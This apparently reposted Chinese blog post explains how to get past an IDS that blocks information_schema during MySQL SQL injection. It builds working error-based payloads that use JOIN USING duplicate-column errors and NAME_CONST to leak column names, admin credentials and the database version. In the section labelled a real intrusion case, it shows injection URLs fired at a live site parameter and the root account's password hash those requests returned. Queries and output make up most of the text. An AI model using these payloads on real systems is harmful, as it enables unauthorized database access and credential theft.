原文:绕过IDS过滤information_schema继续注入
//利用MySQL出错爆出字段
mysql> SELECT * FROM (SELECT * FROM user A JOIN user B) C;
ERROR 1060 (42S21): Duplicate column name 'Host'
mysql> SELECT * FROM (SELECT * FROM user A JOIN user B USING (Host)) C;
ERROR 1060 (42S21): Duplicate column name 'User'
mysql> SELECT * FROM (SELECT * FROM user A JOIN user B USING (Host,User)) C;
ERROR 1060 (42S21): Duplicate column name 'Password'
…..
//得到信息
//可能是版本问题,我测试没能成功
mysql> SELECT NAME_CONST((SELECT Host FROM user LIMIT 0,1),0);
ERROR 1210 (HY000): Incorrect arguments to NAME_CONST
好像是NAME_CONST的参数必须为CONST还是怎么了,悲剧。
下次再好好测试一下。
Update:确实是版本的问题(高版本要求参数全为const,否则报错),这方法的通用性看来不是很好。
mysql> SELECT version();
+---------------------+
| version()           |
+---------------------+
| 5.0.27-community-nt |
+---------------------+
1 row in set (0.00 sec)
mysql> SELECT NAME_CONST((SELECT user()),0);
+----------------+
| root@localhost |
+----------------+
|              0 |
+----------------+
1 row in set (0.00 sec)
-------------------------------------
mysql> SELECT version();
+------------------+
| version()        |
+------------------+
| 5.1.35-community |
+------------------+
1 row in set (0.00 sec)
mysql> SELECT NAME_CONST((SELECT version()),0);
ERROR 1210 (HY000): Incorrect arguments to NAME_CONST
原来做渗透的时候,遇到过一个站,IDS过滤了information_schema,导致后来我没有搞定。前天看文章,发现一个绕过的方法,本地测试了下,也和月牛讨论了下,最后在月牛的帮助下,把语句都构造好了。原来那个点,回去再看,也就搞定了。后来被当哥把方法给放出来了,那就公布吧。
1.本地构造测试表
mysql> create table users(id int,name varchar(20),passwd varchar(32));
Query OK, 0 rows affected (0.04 sec)
mysql> insert into users value(1,’mickey’,’827ccb0eea8a706c4c34a16891f84e7b’);
Query OK, 1 row affected (0.00 sec)
mysql> create table news(is_admin int(1),id int(2),title varchar(100),date date);
Query OK, 0 rows affected (0.00 sec)
mysql> insert into news values(1,1,’hello,mickey’,now());
Query OK, 1 row affected, 1 warning (0.00 sec)
2.暴列名
mysql> select * from (select * from users as a join news as b) as c;
ERROR 1060 (42S21): Duplicate column name 'id'
mysql> select * from (select * from users a join users b using(id)) c;
ERROR 1060 (42S21): Duplicate column name 'name'
mysql> select * from (select * from users a join users b using(id,name)) c;
ERROR 1060 (42S21): Duplicate column name 'passwd'
mysql> select * from (select * from users a join users b using(id,name,passwd)) c;
+------+--------+----------------------------------+
| id   | name   | passwd                           |
+------+--------+----------------------------------+
|    1 | mickey | 827ccb0eea8a706c4c34a16891f84e7b |
+------+--------+----------------------------------+
1 row in set (0.00 sec)
mysql> select * from (select * from news a join news b using(id)) as c;
ERROR 1060 (42S21): Duplicate column name 'is_admin'
mysql> select * from (select * from news a join news b using(id,is_admin)) as c;
ERROR 1060 (42S21): Duplicate column name 'title'
mysql> select * from (select * from news a join news b using(id,is_admin,title)) as c;
ERROR 1060 (42S21): Duplicate column name 'date'
mysql> select * from (select * from news a join news b using(id,is_admin,title,date)) as c;
+----------+------+--------------+------------+
| is_admin | id   | title        | date       |
+----------+------+--------------+------------+
|        1 |    1 | hello,mickey | 2010-05-08 |
+----------+------+--------------+------------+
1 row in set (0.00 sec)
3.暴字段值 (这个语句是月牛想出来的)
研究出来的暴制语句
select * from cms_votes where vid=1 and exists
(select * from (select * from (select name_const((select group_concat(concat(uid,0x7c,pwd)) from admin)
,’fuck’)) a join (select name_const((select group_concat(concat(uid,0x7c,pwd)) from admin),’fuck’)) b)c);
运用:
mysql> select * from cms_votes where vid=1 and exists
(select * from (select * from (select name_const(
(select group_concat(concat(uid,0x7c,pwd)) from admin),’fuck’)) a
join (select name_const((select group_concat(concat(uid,0x7c,pwd)) fromadmin),
‘fuck’)) b)c);
ERROR 1060 (42S21): Duplicate column name 'ylbhz|fuck,mickey|fucked'
mysql>
mysql> select * from cms_votes where vid=1 and exists
(select * from (select * from (select name_const(@@version,0))
a join (select name_const(@@version,0)) b)c);
ERROR 1060 (42S21): Duplicate column name '5.0.45-community-nt'
4.实际入侵案例
&cid=261+and+exists(select*from+(select*from(select+name_const(@@version,0))a+
join+(select+name_const(@@version,0))b)c)
Error:Duplicate column name '5.0.27-community-nt'
Error:Duplicate column name '5.0.27-community-nt'
sid=19&cid=261+and+exists(select*from+(select*from(
select+name_const((select+concat(user,password)+from+mysql.user+limit+0,1),0))a+join+
(select+name_const((select+concat(user,password)+from+mysql.user+limit+0,1),0))b)c)
Error:Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
Error:Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
最后多谢月牛的指导与讨论。